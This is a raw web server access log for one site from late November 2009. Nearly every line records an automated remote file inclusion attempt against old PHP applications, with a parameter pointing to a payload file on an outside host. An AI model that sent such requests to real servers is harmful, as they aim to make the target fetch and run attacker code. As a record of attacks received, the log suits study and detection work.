209.92.156.53 - - [30/Nov/2009:01:15:10 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [30/Nov/2009:01:15:10 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.131.226.52 - - [30/Nov/2009:01:15:30 -0800] "GET //vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:01:15:30 -0800] "GET /logs/access_091116.log///vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:01:15:30 -0800] "GET /logs///vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [30/Nov/2009:01:16:10 -0800] "GET /logs/access_090914.log%20%20///vwar/backup/errors.php?error=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:16:32 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:16:32 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:16:33 -0800] "GET /logs/access_090608.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:16:35 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:16:38 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:16:43 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:16:50 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:16:54 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:16:55 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:16:56 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:17:11 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:17:20 -0800] "GET /logs/access_090608.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:17:20 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:17:22 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [30/Nov/2009:01:17:23 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [30/Nov/2009:01:17:23 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.200.255.18 - - [30/Nov/2009:01:17:23 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:17:31 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:17:32 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:17:38 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:17:50 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:18:00 -0800] "GET /logs//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
199.231.148.194 - - [30/Nov/2009:01:18:00 -0800] "GET /logs/access.log%20%20//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
199.231.148.194 - - [30/Nov/2009:01:18:01 -0800] "GET /gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:01:18:02 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:18:05 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:18:05 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:18:08 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:18:18 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:18:18 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:18:18 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:18:24 -0800] "GET /logs/access_090914.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:18:50 -0800] "GET /gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.66.10 - - [30/Nov/2009:01:18:50 -0800] "GET /logs//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.200.255.18 - - [30/Nov/2009:01:18:52 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:18:55 -0800] "GET /logs/access_090713.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:18:55 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:19:10 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:01:19:10 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:01:20:06 -0800] "GET /logs/access_090706.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:01:20:06 -0800] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:20:35 -0800] "GET /logs/access_090831.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:20:35 -0800] "GET /logs/access_090706.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:20:35 -0800] "GET /logs/access_090803.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:20:35 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:20:35 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:20:46 -0800] "GET /logs/access_091102.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:20:46 -0800] "GET /logs/access_090921.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:20:53 -0800] "GET /logs/access_090622.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:20:53 -0800] "GET /logs/access_090720.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:02 -0800] "GET /logs/access_091116.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:02 -0800] "GET /logs/access_090518.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:09 -0800] "GET /logs/access_090629.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:09 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:10 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:10 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:15 -0800] "GET /logs/access_090914.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:15 -0800] "GET /logs/access_090615.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:15 -0800] "GET /logs/access_090601.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:21:18 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:20 -0800] "GET /logs/access_090525.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:20 -0800] "GET /logs/access_091026.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:20 -0800] "GET /logs/access_090907.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:21:24 -0800] "GET /gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:21:24 -0800] "GET /logs//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:21:24 -0800] "GET /logs/access_090803.log//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [30/Nov/2009:01:21:30 -0800] "GET /logs/access_090511.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:22:10 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:22:35 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:22:41 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:23:02 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.117 - - [30/Nov/2009:01:23:03 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
67.195.115.117 - - [30/Nov/2009:01:23:04 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
91.192.20.164 - - [30/Nov/2009:01:23:24 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [30/Nov/2009:01:23:50 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [30/Nov/2009:01:23:50 -0800] "GET /logs/access_090518.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [30/Nov/2009:01:23:50 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.152 - - [30/Nov/2009:01:23:52 -0800] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:24:21 -0800] "GET /logs/access.log//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.131.150.10 - - [30/Nov/2009:01:26:01 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.medisite.fr/id???? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
121.131.150.10 - - [30/Nov/2009:01:26:01 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.medisite.fr/id???? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:26:02 -0800] "GET /logs//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:26:03 -0800] "GET /gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:26:03 -0800] "GET /logs/access_090803.log//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [30/Nov/2009:01:26:05 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [30/Nov/2009:01:26:05 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [30/Nov/2009:01:26:05 -0800] "GET /logs/access_090518.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:26:21 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:26:21 -0800] "GET /logs/access_090803.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:27:42 -0800] "GET /logs/access.log//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [30/Nov/2009:01:28:41 -0800] "GET /logs/access_090720.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:28:41 -0800] "GET /logs/access_090803.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:28:41 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:29:24 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:29:26 -0800] "GET /logs/access_090803.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:29:39 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.71.237.150 - - [30/Nov/2009:01:29:56 -0800] "GET /skin/happycast_category_bluishgreen/login.php?dir=http://woorizip1004.net/zboard/data/album2/1239110194/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:01:29:56 -0800] "GET /logs//skin/happycast_category_bluishgreen/login.php?dir=http://woorizip1004.net/zboard/data/album2/1239110194/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [30/Nov/2009:01:29:56 -0800] "GET /logs/access.log//skin/happycast_category_bluishgreen/login.php?dir=http://woorizip1004.net/zboard/data/album2/1239110194/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:29:59 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:29:59 -0800] "GET /logs/access_090803.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:29:59 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:30:32 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:30:32 -0800] "GET /logs/access_090803.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:30:33 -0800] "GET /logs/access_090907.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:30:37 -0800] "GET /logs/access_090803.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
